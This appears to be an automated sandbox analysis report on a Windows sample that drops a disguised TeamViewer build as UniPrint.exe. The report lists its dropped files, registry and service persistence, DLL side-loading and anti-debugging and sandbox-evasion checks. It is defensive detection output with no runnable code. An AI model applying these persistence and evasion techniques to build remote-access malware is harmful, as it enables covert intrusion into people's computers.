Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982AC0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,StrChrW,StrChrW,SysAllocString,StrChrW,SysAllocString,SysFreeString,VariantInit,VariantInit,StrChrW,StrChrW,lstrlenW,SysAllocStringLen,PathQuoteSpacesW,VariantInit,StrChrW,SysAllocString,StrChrW,VariantInit,StrChrW,StrChrW,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 2_2_70982AC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 2_2_70983DC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 4_2_70983DC0
Source: C:\Users\user\Desktop\wogZe27GBB.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,74E3A680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404356
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70989B10 SwitchDesktop,SetThreadDesktop,LoadLibraryW,GetProcessHeap,HeapAlloc,RtlZeroMemory,GetSystemDirectoryW,PathAddBackslashW,lstrcatW,LoadLibraryExW,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,StrChrW,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep, 2_2_70989B10
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70983DC0 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle, 2_2_70983DC0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAFKBAAAA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6032:120:WilError_01
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985180 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource, 2_2_70985180
Source: C:\Users\user\Desktop\wogZe27GBB.exe File written: C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: wogZe27GBB.exe Static file information: File size 1773472 > 1048576
Source: wogZe27GBB.exe Static PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053E60D push ecx; ret 4_2_0053E620
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053BD8D push ecx; ret 4_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0295E1DD push esp; retf 17_3_0295E4B1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02960970 push eax; retf 17_3_02960971
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02935295 push ebx; iretd 17_3_029353CB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0293209A push ebx; retf 17_3_0293209B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292D483 push ebx; retf 17_3_0292D4FF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029304A8 push ebx; retn 0019h 17_3_0293052F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029314AE push ebx; ret 17_3_029314AF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02931AD5 push ebx; iretd 17_3_02931AE3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02931CC2 push ebx; ret 17_3_02931D03
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029308C9 push ebx; iretd 17_3_02930A97
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292EEFF push 00000029h; iretd 17_3_0292EF04
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029330E2 push ebx; retf 17_3_029330E3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02930E14 push ebx; ret 17_3_02930F2B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02931004 push cs; iretd 17_3_02931005
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02931836 push ebx; retf 17_3_029318C3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02930039 push ebx; retf 0021h 17_3_029300B7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0293083E push ebx; retf 17_3_0293083F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02933222 push ebx; ret 17_3_0293324B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292D826 push ebx; retf 17_3_0292D827
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0293042A push ebx; ret 17_3_029304A7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02933E40 push ebx; retf 17_3_02933E47
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0293027C push ebx; iretd 17_3_02930287
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_0292DC6A push ebx; ret 17_3_0292DC6B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029363B2 push ebx; iretd 17_3_029363B3
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029369B4 push ebx; iretd 17_3_029369BF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02936BA1 push ebx; retf 17_3_02936CFF
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029351AA push ebx; retf 17_3_029351AB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_029357DD push ebx; retf 17_3_029359BB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 17_3_02936F17 push ebx; iretd 17_3_02936F1F
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405E88

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW, 4_2_004E177C

Boot Survival:

Creates or modifies windows services
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70983920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW, 2_2_70983920
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\wogZe27GBB.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004FB7F9 4_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004DC9D6 4_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00500C6A 4_2_00500C6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004FFF68 4_2_004FFF68
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6704 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164 Thread sleep count: 103 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164 Thread sleep time: -51500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392 Thread sleep count: 80 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392 Thread sleep time: -40000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_7098B420
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004FFF68 4_2_004FFF68
Contains functionality to query network adapter information
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo, 4_2_004B9A29
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetAdaptersInfo, 4_2_709888E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose, 0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 2_2_70982EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 2_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 4_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 4_2_70982EF0
Source: svchost.exe, 00000003.00000002.545837085.0000024FB0060000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000003.00000002.512388496.0000024FAA829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`S
Source: svchost.exe, 00000003.00000002.543297207.0000024FB0048000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.509995145.0000020167402000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000007.00000002.511295701.0000020167428000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.512172229.000001563502A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Open window title or class name: ollydbg
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0053496B
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_7098B420
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405E88
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B890 FreeLibrary,GetProcessHeap,HeapFree,HeapDestroy, 2_2_7098B890
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0051523A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0053496B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00534A9B

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709854A0 LogonUserW,GetLastError,CloseHandle, 2_2_709854A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709834E0 OpenProcessToken,HeapAlloc,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidW,FreeSid,GetProcessHeap,HeapFree,CloseHandle, 2_2_709834E0
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmp Binary or memory string: Program ManagerX
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp Binary or memory string: Program Manager4
Source: UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 2_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_xtoa_s@20, 4_2_0054113A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA, 4_2_0054E79D
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA, 4_2_0054E87F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 4_2_0054E915
